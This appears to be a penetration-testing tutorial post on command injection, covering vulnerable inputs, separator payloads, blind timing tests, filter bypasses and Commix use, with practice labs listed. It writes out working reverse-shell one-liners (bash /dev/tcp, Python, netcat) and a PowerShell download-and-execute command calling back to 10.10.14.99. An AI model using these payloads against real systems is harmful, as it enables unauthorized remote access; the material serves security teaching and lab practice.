Post 4: Command Injection
Turning Web Inputs into System Shells
Command Injection occurs when user input is passed directly to the system shell without proper sanitization. This allows an attacker to run arbitrary commands — and in many cases, it leads directly to remote code execution (RCE).
This post walks you through finding, confirming, and exploiting command injection — manually and reliably.
Table of Contents
- What is Command Injection?
- Identifying Vulnerable Entry Points
- Manual Testing and Payloads
- Getting Command Output
- Turning Injection into a Reverse Shell
- Bypassing Filters
- Practical Tips and Tools
1. What is Command Injection?
Command injection occurs when a web application takes user input and uses it in a system-level command, like:
ping -c 1 $USER_INPUT
If the input isn’t validated, attackers can inject additional commands using shell separators like:
; & && | ||
2. Identifying Vulnerable Entry Points
Common places to find command injection:
- Ping tools
- Traceroute pages
- DNS lookup / host resolver tools
- Any form that interacts with the OS
- File upload, unzip, backup tools
Example:
http://target.com/ping?host=127.0.0.1
Try appending:
127.0.0.1; whoami
3. Manual Testing and Payloads
Here are reliable payloads to test for injection:
127.0.0.1; whoami # ; separates commands
127.0.0.1 && whoami # Only runs if first command succeeds
127.0.0.1 | whoami # Pipe output to second command
127.0.0.1 || whoami # Only runs if first command fails
If nothing happens, try blind techniques (timing-based):
127.0.0.1; sleep 5 # Does the page delay?
127.0.0.1 && ping -n 10 127.0.0.1 > nul # Windows delay
4. Getting Command Output
Some applications will show the output directly — jackpot.
If output is hidden, try redirecting it to a web-accessible file:
127.0.0.1; whoami > /var/www/html/test.txt
Then check:
http://target.com/test.txt
5. Turning Injection into a Reverse Shell
Once you confirm injection, escalate to a reverse shell:
Linux Reverse Shell (bash)
127.0.0.1; bash -i >& /dev/tcp/10.10.14.99/4444 0>&1
Python
127.0.0.1; python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.14.99",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh"])'
Netcat
127.0.0.1; nc 10.10.14.99 4444 -e /bin/bash
Make sure your listener is up:
nc -lvnp 4444
For Windows:
127.0.0.1 & powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.99/shell.ps1')"
6. Bypassing Filters
Web apps often try to block special characters or obvious commands.
Tricks to evade filters:
- URL encode characters:
%3B = ;
%26 = &
%7C = |
- Use alternate shells:
127.0.0.1|`whoami`
127.0.0.1||powershell whoami
- Use command chaining:
127.0.0.1 && echo vulnerable
- Obfuscate commands:
127.0.0.1; $(whoami)
127.0.0.1; `whoami`
7. Practical Tips and Tools
Manual Testing:
- Burp Repeater — test payloads one by one
- Proxy all requests for deeper analysis
Tools:
- Commix (automated testing):
commix --url="http://target.com/ping?host=127.0.0.1" --technique=BEUSTQ
Use --os-cmd, --os-shell, or --os-pwn options to escalate.
- wfuzz / ffuf to fuzz with payloads:
ffuf -u http://target.com/ping?host=FUZZ -w payloads.txt
Checklist for Command Injection
| Test Area | Description |
|---|---|
| Input fields | Ping, traceroute, DNS lookups |
| Output visibility | Does the command output show up? |
| Blind injection | Does a delay occur when using sleep/ping? |
| Reverse shell capability | Can you run bash, python, nc? |
| Filters in place | Can you bypass input filters? |
| Automation tools | Use commix after manual confirmation |
Practice Targets
- TryHackMe: Command Injection, Vulnversity, Pickle Rick
- PortSwigger Labs: Command injection series
- DVWA and bWAPP: Command Injection modules
Coming Up Next
Post 5: Cross-Site Scripting (XSS)
We’ll dive into:
- Reflected vs Stored vs DOM XSS
- Writing and testing payloads
- Bypassing filters and WAFs
- Stealing cookies, redirecting users, popping alerts